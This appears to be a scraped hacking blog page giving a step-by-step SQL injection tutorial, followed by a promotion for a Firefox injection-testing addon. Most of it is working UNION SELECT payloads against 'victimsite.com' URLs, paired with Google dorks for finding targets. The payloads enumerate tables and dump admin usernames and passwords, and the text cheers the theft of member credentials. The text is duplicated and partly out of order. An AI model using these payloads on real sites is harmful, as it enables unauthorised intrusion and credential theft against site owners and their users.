Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
If the above method is not working then try this:
It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).
Like this:
Now select 1 number.
It showing 3,7. Let's take the Number 3.
Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"
For eg:
It will show the version as 5.0.1 or 4.3. something like this.
Replace the version() with database() and user() for finding the database,user respectively.
For eg:
If the above is not working,then try this:
Step 6: Finding the Table Name
if the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For eg:
Now select the "admin " table.
if the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .
Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()
This will open the small window ,enter the table name which you found. i am going to use the admin table name.
click ok
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.
Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
Sometime it will show the column is not found.
Then try another column names
Now it will Username and passwords.
Enjoy..!!cheers..!!
If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.
Step 8: Finding the Admin Panel:
Just try with url like:
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:
http://www.ziddu.com/download/13163866/A...t.zip.html
Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.
Some List of Database are:
* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,
SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.
Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.
Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;
Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");
I will give more detail and query in my next thread about the SQL QUERY.
What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.
What an attacker can do?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
Now let's dive into the real procedure for the SQL Injection.
Follow my steps.
Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html
How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.
Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)
For eg:
http://www.victimsite.com/index.php?id=2'If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".
For eg:
change the number until you get the error as "unknown column"http://www.victimsite.com/index.php?id=2 order by 1http://www.victimsite.com/index.php?id=2 order by 2http://www.victimsite.com/index.php?id=2 order by 3http://www.victimsite.com/index.php?id=2 order by 4
if you get the error while trying the "x"th number,then no of column is "x-1".
I mean:
so now x=8 , The number of column is x-1 i.e, 7.http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).
Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).
Like this:
Now select 1 number.
It showing 3,7. Let's take the Number 3.
Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--It will show the version as 5.0.1 or 4.3. something like this.
Replace the version() with database() and user() for finding the database,user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--Step 6: Finding the Table Name
if the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For eg:
Now it will show the list of table names. Find the table name which is related with the admin or user.http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now select the "admin " table.
if the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .
Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()
This will open the small window ,enter the table name which you found. i am going to use the admin table name.
click ok
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.
Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--Sometime it will show the column is not found.
Then try another column names
Now it will Username and passwords.
Enjoy..!!cheers..!!
If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.
Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:
http://www.ziddu.com/download/13163866/A...t.zip.html
Saturday, February 4, 2012
SQL Inject me - website hacking with firefox
Firefox is a nice web browser and you can also improve its performance and usage with some available addons. If you love penetration testing or trying to hack a website, firefox can be a hacking tool for you.
SQL Injection is a well known vulnerability of websites which can be found in most of the website using database. The main reason for this vulnerability is that web developers always ignore some security measures. So hacking a website with SQL injection is usually easy in most of the websites.
SQL Inject Me is a firefox addon which turns firefox web browser into SQL injection testing tool. The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.
Add to your firefox from here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/?src=search
SQL Injection is a well known vulnerability of websites which can be found in most of the website using database. The main reason for this vulnerability is that web developers always ignore some security measures. So hacking a website with SQL injection is usually easy in most of the websites.
SQL Inject Me is a firefox addon which turns firefox web browser into SQL injection testing tool. The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.
Add to your firefox from here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/?src=search
Subscribe to:
Comments (Atom)
